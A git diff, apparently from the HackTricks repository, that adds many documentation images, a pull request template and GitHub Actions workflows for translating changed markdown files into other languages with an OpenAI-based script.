diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1).png new file mode 100644 index 0000000000..66bce84492 Binary files /dev/null and b/.gitbook/assets/image (4) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1).png new file mode 100644 index 0000000000..c0aaaf701c Binary files /dev/null and b/.gitbook/assets/image (4) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1).png b/.gitbook/assets/image (4) (1) (1).png new file mode 100644 index 0000000000..44dbbe0a5d Binary files /dev/null and b/.gitbook/assets/image (4) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (2).png b/.gitbook/assets/image (4) (1) (2).png new file mode 100644 index 0000000000..302760b437 Binary files /dev/null and b/.gitbook/assets/image (4) (1) (2).png differ diff --git a/.gitbook/assets/image (4) (1) (3).png b/.gitbook/assets/image (4) (1) (3).png new file mode 100644 index 0000000000..536d3c291a Binary files /dev/null and b/.gitbook/assets/image (4) (1) (3).png differ diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png new file mode 100644 index 0000000000..e363ea97e9 Binary files /dev/null and b/.gitbook/assets/image (4) (1).png differ diff --git a/.gitbook/assets/image (4) (2) (1).png b/.gitbook/assets/image (4) (2) (1).png new file mode 100644 index 0000000000..c57fa4d22d Binary files /dev/null and b/.gitbook/assets/image (4) (2) (1).png differ diff --git a/.gitbook/assets/image (4) (2).png b/.gitbook/assets/image (4) (2).png new file mode 100644 index 0000000000..e8609ada16 Binary files /dev/null and b/.gitbook/assets/image (4) (2).png differ diff --git a/.gitbook/assets/image (4) (3).png b/.gitbook/assets/image (4) (3).png new file mode 100644 index 0000000000..f2f075bb9d Binary files /dev/null and b/.gitbook/assets/image (4) (3).png differ 
diff --git a/.gitbook/assets/image (4) (4).png b/.gitbook/assets/image (4) (4).png new file mode 100644 index 0000000000..a59c7aee12 Binary files /dev/null and b/.gitbook/assets/image (4) (4).png differ diff --git a/.gitbook/assets/image (4) (5).png b/.gitbook/assets/image (4) (5).png new file mode 100644 index 0000000000..b16455cdf1 Binary files /dev/null and b/.gitbook/assets/image (4) (5).png differ diff --git a/.gitbook/assets/image (4) (6).png b/.gitbook/assets/image (4) (6).png new file mode 100644 index 0000000000..73f8be8802 Binary files /dev/null and b/.gitbook/assets/image (4) (6).png differ diff --git a/.gitbook/assets/image (4) (7).png b/.gitbook/assets/image (4) (7).png new file mode 100644 index 0000000000..e99c0a173e Binary files /dev/null and b/.gitbook/assets/image (4) (7).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png new file mode 100644 index 0000000000..ba90a93f7a Binary files /dev/null and b/.gitbook/assets/image (4).png differ diff --git a/.gitbook/assets/image (40).png b/.gitbook/assets/image (40).png new file mode 100644 index 0000000000..b57f12f1b5 Binary files /dev/null and b/.gitbook/assets/image (40).png differ diff --git a/.gitbook/assets/image (41).png b/.gitbook/assets/image (41).png new file mode 100644 index 0000000000..0ea673488f Binary files /dev/null and b/.gitbook/assets/image (41).png differ diff --git a/.gitbook/assets/image (42).png b/.gitbook/assets/image (42).png new file mode 100644 index 0000000000..66bce84492 Binary files /dev/null and b/.gitbook/assets/image (42).png differ diff --git a/.gitbook/assets/image (43).png b/.gitbook/assets/image (43).png new file mode 100644 index 0000000000..66bce84492 Binary files /dev/null and b/.gitbook/assets/image (43).png differ diff --git a/.gitbook/assets/image (44).png b/.gitbook/assets/image (44).png new file mode 100644 index 0000000000..feea4d9138 Binary files /dev/null and b/.gitbook/assets/image (44).png differ 
diff --git a/.gitbook/assets/image (45).png b/.gitbook/assets/image (45).png new file mode 100644 index 0000000000..d2bc442169 Binary files /dev/null and b/.gitbook/assets/image (45).png differ diff --git a/.gitbook/assets/image (46).png b/.gitbook/assets/image (46).png new file mode 100644 index 0000000000..d68bdcd0ce Binary files /dev/null and b/.gitbook/assets/image (46).png differ diff --git a/.gitbook/assets/image (47).png b/.gitbook/assets/image (47).png new file mode 100644 index 0000000000..0bae024bc6 Binary files /dev/null and b/.gitbook/assets/image (47).png differ diff --git a/.gitbook/assets/image (48).png b/.gitbook/assets/image (48).png new file mode 100644 index 0000000000..0f269bd025 Binary files /dev/null and b/.gitbook/assets/image (48).png differ diff --git a/.gitbook/assets/image (49).png b/.gitbook/assets/image (49).png new file mode 100644 index 0000000000..6c458d0381 Binary files /dev/null and b/.gitbook/assets/image (49).png differ diff --git a/.gitbook/assets/image (5) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (5) (1) (1) (1) (1) (1).png new file mode 100644 index 0000000000..69a19c247b Binary files /dev/null and b/.gitbook/assets/image (5) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (5) (1) (1) (1) (1).png b/.gitbook/assets/image (5) (1) (1) (1) (1).png new file mode 100644 index 0000000000..25c46bcddc Binary files /dev/null and b/.gitbook/assets/image (5) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (5) (1) (1) (1).png b/.gitbook/assets/image (5) (1) (1) (1).png new file mode 100644 index 0000000000..14f5183350 Binary files /dev/null and b/.gitbook/assets/image (5) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (5) (1) (1) (2).png b/.gitbook/assets/image (5) (1) (1) (2).png new file mode 100644 index 0000000000..8ddc972366 Binary files /dev/null and b/.gitbook/assets/image (5) (1) (1) (2).png differ 
diff --git a/.gitbook/assets/image (5) (1) (1).png b/.gitbook/assets/image (5) (1) (1).png new file mode 100644 index 0000000000..1bb2bcc6dd Binary files /dev/null and b/.gitbook/assets/image (5) (1) (1).png differ diff --git a/.gitbook/assets/image (5) (1).png b/.gitbook/assets/image (5) (1).png new file mode 100644 index 0000000000..bf87460b34 Binary files /dev/null and b/.gitbook/assets/image (5) (1).png differ diff --git a/.gitbook/assets/image (5) (2) (1).png b/.gitbook/assets/image (5) (2) (1).png new file mode 100644 index 0000000000..e9fccac516 Binary files /dev/null and b/.gitbook/assets/image (5) (2) (1).png differ diff --git a/.gitbook/assets/image (5) (2).png b/.gitbook/assets/image (5) (2).png new file mode 100644 index 0000000000..7392394d49 Binary files /dev/null and b/.gitbook/assets/image (5) (2).png differ diff --git a/.gitbook/assets/image (5) (3).png b/.gitbook/assets/image (5) (3).png new file mode 100644 index 0000000000..c6e328ea9c Binary files /dev/null and b/.gitbook/assets/image (5) (3).png differ diff --git a/.gitbook/assets/image (5) (4).png b/.gitbook/assets/image (5) (4).png new file mode 100644 index 0000000000..9809acdd56 Binary files /dev/null and b/.gitbook/assets/image (5) (4).png differ diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png new file mode 100644 index 0000000000..c1ab1e9297 Binary files /dev/null and b/.gitbook/assets/image (5).png differ diff --git a/.gitbook/assets/image (50).png b/.gitbook/assets/image (50).png new file mode 100644 index 0000000000..f2584b8ffc Binary files /dev/null and b/.gitbook/assets/image (50).png differ diff --git a/.gitbook/assets/image (51).png b/.gitbook/assets/image (51).png new file mode 100644 index 0000000000..ec1557dd97 Binary files /dev/null and b/.gitbook/assets/image (51).png differ 
diff --git a/.gitbook/assets/image (52).png b/.gitbook/assets/image (52).png new file mode 100644 index 0000000000..1bb2bcc6dd Binary files /dev/null and b/.gitbook/assets/image (52).png differ diff --git a/.gitbook/assets/image (53).png b/.gitbook/assets/image (53).png new file mode 100644 index 0000000000..08b73f5eaa Binary files /dev/null and b/.gitbook/assets/image (53).png differ diff --git a/.gitbook/assets/image (54).png b/.gitbook/assets/image (54).png new file mode 100644 index 0000000000..c08e410cfb Binary files /dev/null and b/.gitbook/assets/image (54).png differ diff --git a/.gitbook/assets/image (55).png b/.gitbook/assets/image (55).png new file mode 100644 index 0000000000..7f9833bf88 Binary files /dev/null and b/.gitbook/assets/image (55).png differ diff --git a/.gitbook/assets/image (56).png b/.gitbook/assets/image (56).png new file mode 100644 index 0000000000..7593f6f365 Binary files /dev/null and b/.gitbook/assets/image (56).png differ diff --git a/.gitbook/assets/image (57).png b/.gitbook/assets/image (57).png new file mode 100644 index 0000000000..ec4b3c358c Binary files /dev/null and b/.gitbook/assets/image (57).png differ diff --git a/.gitbook/assets/image (58).png b/.gitbook/assets/image (58).png new file mode 100644 index 0000000000..9656e4b649 Binary files /dev/null and b/.gitbook/assets/image (58).png differ diff --git a/.gitbook/assets/image (59).png b/.gitbook/assets/image (59).png new file mode 100644 index 0000000000..fb5aa4f77c Binary files /dev/null and b/.gitbook/assets/image (59).png differ diff --git a/.gitbook/assets/image (6) (1) (1) (1).png b/.gitbook/assets/image (6) (1) (1) (1).png new file mode 100644 index 0000000000..2150062b9d Binary files /dev/null and b/.gitbook/assets/image (6) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (6) (1) (1).png b/.gitbook/assets/image (6) (1) (1).png new file mode 100644 index 0000000000..cd88db3ce5 Binary files /dev/null and b/.gitbook/assets/image (6) (1) (1).png differ 
diff --git a/.gitbook/assets/image (6) (1) (2).png b/.gitbook/assets/image (6) (1) (2).png new file mode 100644 index 0000000000..cfd9fb6d0d Binary files /dev/null and b/.gitbook/assets/image (6) (1) (2).png differ diff --git a/.gitbook/assets/image (6) (1).png b/.gitbook/assets/image (6) (1).png new file mode 100644 index 0000000000..08b73f5eaa Binary files /dev/null and b/.gitbook/assets/image (6) (1).png differ diff --git a/.gitbook/assets/image (6) (2).png b/.gitbook/assets/image (6) (2).png new file mode 100644 index 0000000000..5c0065e428 Binary files /dev/null and b/.gitbook/assets/image (6) (2).png differ diff --git a/.gitbook/assets/image (6) (3).png b/.gitbook/assets/image (6) (3).png new file mode 100644 index 0000000000..b9a0a80755 Binary files /dev/null and b/.gitbook/assets/image (6) (3).png differ diff --git a/.gitbook/assets/image (6).png b/.gitbook/assets/image (6).png new file mode 100644 index 0000000000..ffcaa54f40 Binary files /dev/null and b/.gitbook/assets/image (6).png differ diff --git a/.gitbook/assets/image (60).png b/.gitbook/assets/image (60).png new file mode 100644 index 0000000000..ce50798209 Binary files /dev/null and b/.gitbook/assets/image (60).png differ diff --git a/.gitbook/assets/image (61).png b/.gitbook/assets/image (61).png new file mode 100644 index 0000000000..d0ab10ede3 Binary files /dev/null and b/.gitbook/assets/image (61).png differ diff --git a/.gitbook/assets/image (62).png b/.gitbook/assets/image (62).png new file mode 100644 index 0000000000..c31faa50d4 Binary files /dev/null and b/.gitbook/assets/image (62).png differ diff --git a/.gitbook/assets/image (63).png b/.gitbook/assets/image (63).png new file mode 100644 index 0000000000..2712b6af5f Binary files /dev/null and b/.gitbook/assets/image (63).png differ diff --git a/.gitbook/assets/image (64).png b/.gitbook/assets/image (64).png new file mode 100644 index 0000000000..14f5183350 Binary files /dev/null and b/.gitbook/assets/image (64).png differ 
diff --git a/.gitbook/assets/image (65).png b/.gitbook/assets/image (65).png new file mode 100644 index 0000000000..cd88db3ce5 Binary files /dev/null and b/.gitbook/assets/image (65).png differ diff --git a/.gitbook/assets/image (66).png b/.gitbook/assets/image (66).png new file mode 100644 index 0000000000..aaec7c056b Binary files /dev/null and b/.gitbook/assets/image (66).png differ diff --git a/.gitbook/assets/image (67).png b/.gitbook/assets/image (67).png new file mode 100644 index 0000000000..603c2135d0 Binary files /dev/null and b/.gitbook/assets/image (67).png differ diff --git a/.gitbook/assets/image (68).png b/.gitbook/assets/image (68).png new file mode 100644 index 0000000000..67c7b2f016 Binary files /dev/null and b/.gitbook/assets/image (68).png differ diff --git a/.gitbook/assets/image (69).png b/.gitbook/assets/image (69).png new file mode 100644 index 0000000000..70a0111062 Binary files /dev/null and b/.gitbook/assets/image (69).png differ diff --git a/.gitbook/assets/image (7) (1) (1) (1).png b/.gitbook/assets/image (7) (1) (1) (1).png new file mode 100644 index 0000000000..8dece91134 Binary files /dev/null and b/.gitbook/assets/image (7) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (7) (1) (1) (2).png b/.gitbook/assets/image (7) (1) (1) (2).png new file mode 100644 index 0000000000..34fda8b40e Binary files /dev/null and b/.gitbook/assets/image (7) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (7) (1) (1).png b/.gitbook/assets/image (7) (1) (1).png new file mode 100644 index 0000000000..aaec7c056b Binary files /dev/null and b/.gitbook/assets/image (7) (1) (1).png differ diff --git a/.gitbook/assets/image (7) (1) (2) (1).png b/.gitbook/assets/image (7) (1) (2) (1).png new file mode 100644 index 0000000000..987ff45c21 Binary files /dev/null and b/.gitbook/assets/image (7) (1) (2) (1).png differ 
diff --git a/.gitbook/assets/image (7) (1) (2).png b/.gitbook/assets/image (7) (1) (2).png new file mode 100644 index 0000000000..c9a6e22db7 Binary files /dev/null and b/.gitbook/assets/image (7) (1) (2).png differ diff --git a/.gitbook/assets/image (7) (1).png b/.gitbook/assets/image (7) (1).png new file mode 100644 index 0000000000..c08e410cfb Binary files /dev/null and b/.gitbook/assets/image (7) (1).png differ diff --git a/.gitbook/assets/image (7) (2).png b/.gitbook/assets/image (7) (2).png new file mode 100644 index 0000000000..9e0e60398e Binary files /dev/null and b/.gitbook/assets/image (7) (2).png differ diff --git a/.gitbook/assets/image (7).png b/.gitbook/assets/image (7).png new file mode 100644 index 0000000000..181e9b5e8a Binary files /dev/null and b/.gitbook/assets/image (7).png differ diff --git a/.gitbook/assets/image (70).png b/.gitbook/assets/image (70).png new file mode 100644 index 0000000000..e926bb057e Binary files /dev/null and b/.gitbook/assets/image (70).png differ diff --git a/.gitbook/assets/image (71).png b/.gitbook/assets/image (71).png new file mode 100644 index 0000000000..3c86374856 Binary files /dev/null and b/.gitbook/assets/image (71).png differ diff --git a/.gitbook/assets/image (72).png b/.gitbook/assets/image (72).png new file mode 100644 index 0000000000..9c56df1fde Binary files /dev/null and b/.gitbook/assets/image (72).png differ diff --git a/.gitbook/assets/image (73).png b/.gitbook/assets/image (73).png new file mode 100644 index 0000000000..86d66972e5 Binary files /dev/null and b/.gitbook/assets/image (73).png differ diff --git a/.gitbook/assets/image (74).png b/.gitbook/assets/image (74).png new file mode 100644 index 0000000000..ec568a4fa9 Binary files /dev/null and b/.gitbook/assets/image (74).png differ diff --git a/.gitbook/assets/image (75).png b/.gitbook/assets/image (75).png new file mode 100644 index 0000000000..61b0f90048 Binary files /dev/null and b/.gitbook/assets/image (75).png differ 
diff --git a/.gitbook/assets/image (76).png b/.gitbook/assets/image (76).png new file mode 100644 index 0000000000..7e322c7d28 Binary files /dev/null and b/.gitbook/assets/image (76).png differ diff --git a/.gitbook/assets/image (77).png b/.gitbook/assets/image (77).png new file mode 100644 index 0000000000..fb52dbc6cd Binary files /dev/null and b/.gitbook/assets/image (77).png differ diff --git a/.gitbook/assets/image (78).png b/.gitbook/assets/image (78).png new file mode 100644 index 0000000000..2c1380cee8 Binary files /dev/null and b/.gitbook/assets/image (78).png differ diff --git a/.gitbook/assets/image (79).png b/.gitbook/assets/image (79).png new file mode 100644 index 0000000000..3048b65efa Binary files /dev/null and b/.gitbook/assets/image (79).png differ diff --git a/.gitbook/assets/image (8) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (8) (1) (1) (1) (1) (1).png new file mode 100644 index 0000000000..f1071d8a61 Binary files /dev/null and b/.gitbook/assets/image (8) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (8) (1) (1) (1) (1).png b/.gitbook/assets/image (8) (1) (1) (1) (1).png new file mode 100644 index 0000000000..c57fa4d22d Binary files /dev/null and b/.gitbook/assets/image (8) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (8) (1) (1) (1).png b/.gitbook/assets/image (8) (1) (1) (1).png new file mode 100644 index 0000000000..04471fecbf Binary files /dev/null and b/.gitbook/assets/image (8) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (8) (1) (1).png b/.gitbook/assets/image (8) (1) (1).png new file mode 100644 index 0000000000..603c2135d0 Binary files /dev/null and b/.gitbook/assets/image (8) (1) (1).png differ diff --git a/.gitbook/assets/image (8) (1).png b/.gitbook/assets/image (8) (1).png new file mode 100644 index 0000000000..7f9833bf88 Binary files /dev/null and b/.gitbook/assets/image (8) (1).png differ 
diff --git a/.gitbook/assets/image (8) (2).png b/.gitbook/assets/image (8) (2).png new file mode 100644 index 0000000000..ccbac226e4 Binary files /dev/null and b/.gitbook/assets/image (8) (2).png differ diff --git a/.gitbook/assets/image (8) (3).png b/.gitbook/assets/image (8) (3).png new file mode 100644 index 0000000000..1279948e38 Binary files /dev/null and b/.gitbook/assets/image (8) (3).png differ diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png new file mode 100644 index 0000000000..89120cf88c Binary files /dev/null and b/.gitbook/assets/image (8).png differ diff --git a/.gitbook/assets/image (80).png b/.gitbook/assets/image (80).png new file mode 100644 index 0000000000..6afb7de005 Binary files /dev/null and b/.gitbook/assets/image (80).png differ diff --git a/.gitbook/assets/image (81).png b/.gitbook/assets/image (81).png new file mode 100644 index 0000000000..59add2f1cb Binary files /dev/null and b/.gitbook/assets/image (81).png differ diff --git a/.gitbook/assets/image (82).png b/.gitbook/assets/image (82).png new file mode 100644 index 0000000000..73f8be8802 Binary files /dev/null and b/.gitbook/assets/image (82).png differ diff --git a/.gitbook/assets/image (83) (1).png b/.gitbook/assets/image (83) (1).png new file mode 100644 index 0000000000..cf7f435786 Binary files /dev/null and b/.gitbook/assets/image (83) (1).png differ diff --git a/.gitbook/assets/image (83).png b/.gitbook/assets/image (83).png new file mode 100644 index 0000000000..ad708f4cbd Binary files /dev/null and b/.gitbook/assets/image (83).png differ diff --git a/.gitbook/assets/image (84).png b/.gitbook/assets/image (84).png new file mode 100644 index 0000000000..8e8c8e143a Binary files /dev/null and b/.gitbook/assets/image (84).png differ diff --git a/.gitbook/assets/image (85) (1).png b/.gitbook/assets/image (85) (1).png new file mode 100644 index 0000000000..4a7a7bbec8 Binary files /dev/null and b/.gitbook/assets/image (85) (1).png differ 
diff --git a/.gitbook/assets/image (85).png b/.gitbook/assets/image (85).png new file mode 100644 index 0000000000..4b102f3b33 Binary files /dev/null and b/.gitbook/assets/image (85).png differ diff --git a/.gitbook/assets/image (86).png b/.gitbook/assets/image (86).png new file mode 100644 index 0000000000..321c885ffd Binary files /dev/null and b/.gitbook/assets/image (86).png differ diff --git a/.gitbook/assets/image (87) (1).png b/.gitbook/assets/image (87) (1).png new file mode 100644 index 0000000000..8ee408d4ff Binary files /dev/null and b/.gitbook/assets/image (87) (1).png differ diff --git a/.gitbook/assets/image (87).png b/.gitbook/assets/image (87).png new file mode 100644 index 0000000000..72803d6a21 Binary files /dev/null and b/.gitbook/assets/image (87).png differ diff --git a/.gitbook/assets/image (88).png b/.gitbook/assets/image (88).png new file mode 100644 index 0000000000..26d1fff4bd Binary files /dev/null and b/.gitbook/assets/image (88).png differ diff --git a/.gitbook/assets/image (89) (1).png b/.gitbook/assets/image (89) (1).png new file mode 100644 index 0000000000..05d5e97a94 Binary files /dev/null and b/.gitbook/assets/image (89) (1).png differ diff --git a/.gitbook/assets/image (89).png b/.gitbook/assets/image (89).png new file mode 100644 index 0000000000..677ac1e3a5 Binary files /dev/null and b/.gitbook/assets/image (89).png differ diff --git a/.gitbook/assets/image (9) (1) (1) (1) (1).png b/.gitbook/assets/image (9) (1) (1) (1) (1).png new file mode 100644 index 0000000000..c933d46923 Binary files /dev/null and b/.gitbook/assets/image (9) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (9) (1) (1) (1).png b/.gitbook/assets/image (9) (1) (1) (1).png new file mode 100644 index 0000000000..b9ba83cc03 Binary files /dev/null and b/.gitbook/assets/image (9) (1) (1) (1).png differ 
diff --git a/.gitbook/assets/image (9) (1) (1).png b/.gitbook/assets/image (9) (1) (1).png new file mode 100644 index 0000000000..67c7b2f016 Binary files /dev/null and b/.gitbook/assets/image (9) (1) (1).png differ diff --git a/.gitbook/assets/image (9) (1).png b/.gitbook/assets/image (9) (1).png new file mode 100644 index 0000000000..7593f6f365 Binary files /dev/null and b/.gitbook/assets/image (9) (1).png differ diff --git a/.gitbook/assets/image (9) (2).png b/.gitbook/assets/image (9) (2).png new file mode 100644 index 0000000000..03ad3a91f4 Binary files /dev/null and b/.gitbook/assets/image (9) (2).png differ diff --git a/.gitbook/assets/image (9).png b/.gitbook/assets/image (9).png new file mode 100644 index 0000000000..01b5eed6d9 Binary files /dev/null and b/.gitbook/assets/image (9).png differ diff --git a/.gitbook/assets/image (90).png b/.gitbook/assets/image (90).png new file mode 100644 index 0000000000..327adc67bd Binary files /dev/null and b/.gitbook/assets/image (90).png differ diff --git a/.gitbook/assets/image (91).png b/.gitbook/assets/image (91).png new file mode 100644 index 0000000000..331ec323ab Binary files /dev/null and b/.gitbook/assets/image (91).png differ diff --git a/.gitbook/assets/image (92) (1) (1).png b/.gitbook/assets/image (92) (1) (1).png new file mode 100644 index 0000000000..fb0364e97b Binary files /dev/null and b/.gitbook/assets/image (92) (1) (1).png differ diff --git a/.gitbook/assets/image (92) (1).png b/.gitbook/assets/image (92) (1).png new file mode 100644 index 0000000000..26d1fff4bd Binary files /dev/null and b/.gitbook/assets/image (92) (1).png differ diff --git a/.gitbook/assets/image (92).png b/.gitbook/assets/image (92).png new file mode 100644 index 0000000000..c57fa4d22d Binary files /dev/null and b/.gitbook/assets/image (92).png differ 
diff --git a/.gitbook/assets/image (93).png b/.gitbook/assets/image (93).png new file mode 100644 index 0000000000..dba03333fb Binary files /dev/null and b/.gitbook/assets/image (93).png differ diff --git a/.gitbook/assets/image (94).png b/.gitbook/assets/image (94).png new file mode 100644 index 0000000000..5e3da11539 Binary files /dev/null and b/.gitbook/assets/image (94).png differ diff --git a/.gitbook/assets/image (95).png b/.gitbook/assets/image (95).png new file mode 100644 index 0000000000..3830349ac5 Binary files /dev/null and b/.gitbook/assets/image (95).png differ diff --git a/.gitbook/assets/image (96).png b/.gitbook/assets/image (96).png new file mode 100644 index 0000000000..6267537833 Binary files /dev/null and b/.gitbook/assets/image (96).png differ diff --git a/.gitbook/assets/image (97).png b/.gitbook/assets/image (97).png new file mode 100644 index 0000000000..242eb34e38 Binary files /dev/null and b/.gitbook/assets/image (97).png differ diff --git a/.gitbook/assets/image (98).png b/.gitbook/assets/image (98).png new file mode 100644 index 0000000000..9f61033b1e Binary files /dev/null and b/.gitbook/assets/image (98).png differ diff --git a/.gitbook/assets/image (99).png b/.gitbook/assets/image (99).png new file mode 100644 index 0000000000..b4b0305b79 Binary files /dev/null and b/.gitbook/assets/image (99).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png new file mode 100644 index 0000000000..6cee6d557a Binary files /dev/null and b/.gitbook/assets/image.png differ diff --git a/.gitbook/assets/openshift-missing-service-account-image1.png b/.gitbook/assets/openshift-missing-service-account-image1.png new file mode 100644 index 0000000000..0a4a041e1e Binary files /dev/null and b/.gitbook/assets/openshift-missing-service-account-image1.png differ 
diff --git a/.gitbook/assets/openshift-missing-service-account-image2.png b/.gitbook/assets/openshift-missing-service-account-image2.png new file mode 100644 index 0000000000..be0a6bd7cf Binary files /dev/null and b/.gitbook/assets/openshift-missing-service-account-image2.png differ diff --git a/.gitbook/assets/telegram-cloud-document-4-5875069018120918586.jpg b/.gitbook/assets/telegram-cloud-document-4-5875069018120918586.jpg new file mode 100644 index 0000000000..b7f7fc4c7f Binary files /dev/null and b/.gitbook/assets/telegram-cloud-document-4-5875069018120918586.jpg differ diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5780773316536156543-x.jpg b/.gitbook/assets/telegram-cloud-photo-size-4-5780773316536156543-x.jpg new file mode 100644 index 0000000000..690bdba6ce Binary files /dev/null and b/.gitbook/assets/telegram-cloud-photo-size-4-5780773316536156543-x.jpg differ diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5782633230648853886-y.jpg b/.gitbook/assets/telegram-cloud-photo-size-4-5782633230648853886-y.jpg new file mode 100644 index 0000000000..54ce729387 Binary files /dev/null and b/.gitbook/assets/telegram-cloud-photo-size-4-5782633230648853886-y.jpg differ diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5920521132757336440-y.jpg b/.gitbook/assets/telegram-cloud-photo-size-4-5920521132757336440-y.jpg new file mode 100644 index 0000000000..f8d42cbb30 Binary files /dev/null and b/.gitbook/assets/telegram-cloud-photo-size-4-5920521132757336440-y.jpg differ diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-6044191430395675441-x.jpg b/.gitbook/assets/telegram-cloud-photo-size-4-6044191430395675441-x.jpg new file mode 100644 index 0000000000..f3dc12cd29 Binary files /dev/null and b/.gitbook/assets/telegram-cloud-photo-size-4-6044191430395675441-x.jpg differ diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md new file mode 100644 index 0000000000..c574644889 --- /dev/null 
+++ b/.github/pull_request_template.md @@ -0,0 +1,12 @@ +You can remove this content before sending the PR: + +## Attribution +We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or that have permission to share it from the original author (adding a reference to the author in the added text or at the end of the page you are modifying or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone. + +## HackTricks Training +If you are adding so you can pass the in the [ARTE certification](https://training.hacktricks.xyz/courses/arte) exam with 2 flags instead of 3, you need to call the PR `arte-`. + +Also, remember that grammar/syntax fixes won't be accepted for the exam flag reduction. + + +In any case, thanks for contributing to HackTricks! diff --git a/.github/workflows/translate_af.yml b/.github/workflows/translate_af.yml new file mode 100644 index 0000000000..246ee9ae29 --- /dev/null +++ b/.github/workflows/translate_af.yml 
@@ -0,0 +1,81 @@ +name: Translator to AF (Afrikaans) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: af + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Afrikaans + BRANCH: af + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || 
true + git push --set-upstream origin "$BRANCH" \ No newline at end of file diff --git a/.github/workflows/translate_cn.yml b/.github/workflows/translate_cn.yml new file mode 100644 index 0000000000..61c5f3116b --- /dev/null +++ b/.github/workflows/translate_cn.yml 
@@ -0,0 +1,81 @@ +name: Translator to CN (Chinese) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: cn + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Chinese + BRANCH: cn + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + 
git push --set-upstream origin "$BRANCH" \ No newline at end of file diff --git a/.github/workflows/translate_de.yml b/.github/workflows/translate_de.yml new file mode 100644 index 0000000000..facbeab4ef --- /dev/null +++ b/.github/workflows/translate_de.yml 
